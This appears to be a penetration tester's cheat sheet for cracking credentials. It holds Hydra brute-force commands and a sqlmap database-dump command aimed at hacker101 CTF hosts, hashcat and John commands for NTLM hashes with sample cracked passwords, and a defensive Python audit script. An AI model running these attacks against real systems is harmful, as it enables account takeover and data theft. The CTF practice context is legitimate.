Technique

CRD - Cracking Credentials


1.0 Tools

1.1 Hydra

Cracking usernames (fixed password, candidate usernames from a wordlist; the server's "Invalid username" message marks a failed guess)
hydra -f -L /usr/share/wordlists/john.lst -p xxx a0c3aa0c1c148176b200f6cbda183aec.ctf.hacker101.com https-post-form "/login:username=^USER^&password=^PASS^:Invalid username"
Cracking passwords (fixed username, candidate passwords from a wordlist; "Invalid password" marks a failed guess)
hydra -f -l melosa -P /home/kali/rockyou.txt a0c3aa0c1c148176b200f6cbda183aec.ctf.hacker101.com https-post-form "/login:username=^USER^&password=^PASS^:Invalid password"
The two distinct error messages are what make username enumeration possible here; a login that returns the same message for a wrong username and a wrong password removes that oracle.

2.0 Services

2.1 NTLM

2.1.1 hashcat

Hash mode number

The -m value tells hashcat which hash type to attack; NTLM is -m 1000, and hashcat's --help output lists every mode. If you don't know the hash mode, use 2.1.2 John The Ripper, which auto-detects common formats.

Crack a single Hash
hashcat -m 1000 831486ac7f26860c9e2f51ac91e1a07a /usr/share/wordlists/rockyou.txt
lisa.simpson:831486ac7f26860c9e2f51ac91e1a07a:sexywolfy
Crack an NTLM hash dump (one user:hash per line, as produced by an NTDS extraction; --username tells hashcat to skip the user field)
hashcat -m 1000 --username thesimpsons.domain.ntds /usr/share/wordlists/rockyou.txt
Then list the cracked pairs. --show only reads the potfile and does not run the attack, so it must follow a cracking run:
hashcat -m 1000 --username thesimpsons.domain.ntds /usr/share/wordlists/rockyou.txt --show
 
Guest:31d6cfe0d16ae931b73c59d7e0c089c0:
lisa.simpson:831486ac7f26860c9e2f51ac91e1a07a:sexywolfy
abe.simpson:84bbaa1c58b7f69d2192560a3f932129:iseedeadpeople
krustytheclown:cecd9141cf72794df40a2978afb62c9c:krustytheclown
barney.gumble:b8d76e56e9dac90539aff05e3ccb1755:iknownothing

Guest's hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string, so that account has no password set (it is normally disabled) and hashcat prints an empty plaintext for it; krustytheclown's password is the username itself.

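As an added example (not part of these notes), a small Python script that parses hashcat's user:hash:plaintext --show output and flags what a defender acts on first: accounts with the empty-string NT hash, passwords equal to the username, and identical hashes shared between accounts (same hash means same password, cracked or not). The sample input is the example output above; the function names are my own.

```python
import re
from collections import defaultdict

# NT hash of the empty string: an account with this hash has no password set.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One line of `hashcat -m 1000 --show --username` output: user:nthash:plaintext
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<hash>[0-9a-fA-F]{32}):(?P<plain>.*)$")

# Sample input, taken from the example hashcat output shown earlier on this page.
SAMPLE = """\
Guest:31d6cfe0d16ae931b73c59d7e0c089c0:
lisa.simpson:831486ac7f26860c9e2f51ac91e1a07a:sexywolfy
abe.simpson:84bbaa1c58b7f69d2192560a3f932129:iseedeadpeople
krustytheclown:cecd9141cf72794df40a2978afb62c9c:krustytheclown
barney.gumble:b8d76e56e9dac90539aff05e3ccb1755:iknownothing
"""

def parse_show_output(text):
    """Return a list of (user, nthash, plaintext) tuples; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["user"], m["hash"].lower(), m["plain"]))
    return rows

def audit(rows):
    """Group the weak-credential findings a defender remediates first, by finding type."""
    findings = {"empty_password": [], "password_is_username": [], "shared_password": []}
    by_hash = defaultdict(list)
    for user, nthash, plain in rows:
        by_hash[nthash].append(user)
        if nthash == EMPTY_NT_HASH:
            findings["empty_password"].append(user)
        # Compare case-insensitively: Windows usernames are not case-sensitive.
        elif plain and plain.lower() == user.lower():
            findings["password_is_username"].append(user)
    # Identical NT hashes mean identical passwords, even when neither was cracked.
    for nthash, users in by_hash.items():
        if len(users) > 1 and nthash != EMPTY_NT_HASH:
            findings["shared_password"].append(sorted(users))
    return findings

if __name__ == "__main__":
    for kind, hits in audit(parse_show_output(SAMPLE)).items():
        print(f"{kind}: {hits}")
```

Feed it the real --show output with `python3 audit.py < cracked.txt` after swapping SAMPLE for `sys.stdin.read()`.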
2.1.2 John The Ripper

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
John takes the wordlist via --wordlist=; a bare second path would be read as another hash file. --format=NT pins the NTLM format, since a 32-hex hash is also recognised as other raw formats.
Hint

To measure cracking speed for each format on this machine before tuning a run, benchmark with:

john --test

2.2 SQL

2.2.1 SQLMap

Boolean-based injection test against the login form's username parameter: --regexp "Unknown user" gives sqlmap the response text that identifies a true case, and --dbs / --dump enumerate and extract the databases found.
sqlmap -u https://8156d6ee8b08475c1dc54a238fc70224.ctf.hacker101.com/login --method POST --data "username=FUZZ&password=" -p username --dbs --dbms mysql --regexp "Unknown user" --level 2 --dump --random-agent --threads 10
